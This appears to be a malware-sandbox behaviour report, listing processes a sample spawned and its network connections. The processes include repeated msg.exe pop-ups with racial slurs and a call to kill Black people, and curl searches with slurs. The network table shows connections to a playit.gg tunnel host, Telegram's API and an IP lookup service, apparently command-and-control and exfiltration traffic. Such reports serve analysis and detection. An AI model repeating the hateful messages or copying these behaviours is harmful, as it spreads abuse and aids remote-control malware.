msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --always-read-main-dll --field-trial-handle=21372,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=21400 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --always-read-main-dll --field-trial-handle=2068,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=2832 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --always-read-main-dll --field-trial-handle=21444,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=2800 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --always-read-main-dll --field-trial-handle=21804,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=21956 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --always-read-main-dll --field-trial-handle=22120,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=22084 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --always-read-main-dll --field-trial-handle=22372,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=22420 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --always-read-main-dll --field-trial-handle=22276,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=22540 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

Network

Country Destination Domain Proto
US 8.8.8.8:53 sky-aerial-derby.glitch.me udp
US 151.101.2.59:443 sky-aerial-derby.glitch.me tcp
US 192.124.249.41:80 crl.starfieldtech.com tcp
US 151.101.67.3:80 ocsp.int-r1.certainly.com tcp
US 151.101.2.59:443 sky-aerial-derby.glitch.me tcp
US 162.159.129.232:443 media.discordapp.net tcp
US 162.159.129.232:443 media.discordapp.net tcp
GB 142.250.180.3:80 c.pki.goog tcp
US 173.231.16.77:443 api64.ipify.org tcp
US 173.231.16.77:443 api64.ipify.org tcp
N/A 127.0.0.1:49803 tcp
N/A 127.0.0.1:49810 tcp
N/A 127.0.0.1:49844 tcp
N/A 127.0.0.1:49846 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.180.3:80 c.pki.goog tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.200.46:443 clients2.google.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 150.171.28.11:80 edge.microsoft.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
GB 95.100.153.186:443 copilot.microsoft.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 142.250.187.225:443 clients2.googleusercontent.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com udp
GB 2.18.190.170:443 msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 niggafart.com udp
US 8.8.8.8:53 niggafart.com udp
US 104.21.66.212:443 niggafart.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 104.21.66.212:443 niggafart.com udp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
GB 95.100.153.192:443 www.bing.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 104.21.66.212:443 niggafart.com udp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 104.21.66.212:443 niggafart.com udp
GB 142.250.179.228:443 www.google.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 95.100.153.192:443 www.bing.com udp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 162.159.128.233:443 discord.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 224.0.0.251:5353 udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 104.21.66.212:443 niggafart.com udp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.180.3:80 c.pki.goog tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
GB 142.250.179.228:443 www.google.com tcp
US 13.107.246.64:443 static.edge.microsoftapp.net tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-cloud-resource-static.azureedge.net udp
US 8.8.8.8:53 edge-cloud-resource-static.azureedge.net udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 13.107.246.64:443 edge-cloud-resource-static.azureedge.net tcp
US 13.107.246.64:443 edge-cloud-resource-static.azureedge.net tcp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 104.21.66.212:443 niggafart.com udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
GB 95.100.153.167:443 www.bing.com udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 104.21.66.212:443 niggafart.com udp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
